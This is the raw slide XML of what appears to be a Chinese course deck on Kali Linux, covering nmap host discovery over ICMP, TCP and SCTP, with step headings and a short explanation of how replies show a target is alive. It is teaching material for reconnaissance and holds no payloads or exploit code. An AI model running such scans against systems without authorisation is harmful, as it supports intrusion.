                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tn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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ICMP和TCP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="文本框 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5523230" y="828675"/>
            <a:ext cx="5080000" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.目标主机响应了ICMP请求和TCP请求，说明目标主机是存活的,如图2-2-24所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>因为响应了请求所以说明目标是存活的。可以说是ping和PA、PS的结合。这种扫描方式比较高效，并且不会有过多的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5523230" y="2280285"/>
            <a:ext cx="5267325" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="文本框 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5523230" y="5861685"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-24 目标主机响应ICMP和TCP请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行SCTP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤六</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
